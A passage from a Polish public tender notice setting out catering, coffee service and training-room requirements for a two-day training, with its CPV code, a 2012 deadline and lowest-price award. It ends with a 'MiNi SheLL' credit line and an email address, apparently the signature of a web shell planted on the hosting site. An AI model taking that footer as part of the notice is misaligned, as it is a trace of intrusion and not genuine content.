1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) na bieżąco uzupełniania w godzinach od 19:30 do 24:00
danie na ciepło (3 do wyboru)
Bez ograniczeń ilościowych:
-sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
-przystawki (wybór zimnych przekąsek mięsnych i rybnych)
-wędliny (różnorodne, minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe) 
-warzywa (świeże i konserwowe)
-pieczywo (różnorodne- jasne, ciemne, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna- czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.5.3.Śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
-wędliny (różnorodne- minimum 5 rodzai)
-sery (różnorodne- żółte, pleśniowe, białe)
-dżemy
-jajka
-płatki śniadaniowe, muesli
-mleko (ciepłe i zimne)
-jogurty
-świeże owoce
-pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)herbata (różnorodna: czarna, zielona, owocowa)woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
-przystawki (wybór zimnych przekąsek mięsnych, rybnych)
-zupa (dwie do wyboru)
-dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
-dodatki (ziemniaki, frytki, ryż, makaron)
-surówki (minimum trzy do wyboru)
-desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
-napoje: kawa (różnorodna- z expresu, rozpuszczalna, capuccino, latte)
-herbata (różnorodna: czarna, zielona, owocowa)
-woda (gazowana i niegazowana)
-soki owocowe (minimum trzy rodzaje)
-napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.6.Wykonawca zapewni dla każdego uczestnika szkolenia suchy prowiant na podróż obejmujący: kanapkę, owoc, ciasto/baton, sok w kartoniku, wodę mineralną.
1.7.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną-z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną- czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sal szkoleniowych.
1.8.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.9.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.10.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.11.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.12.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.13.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com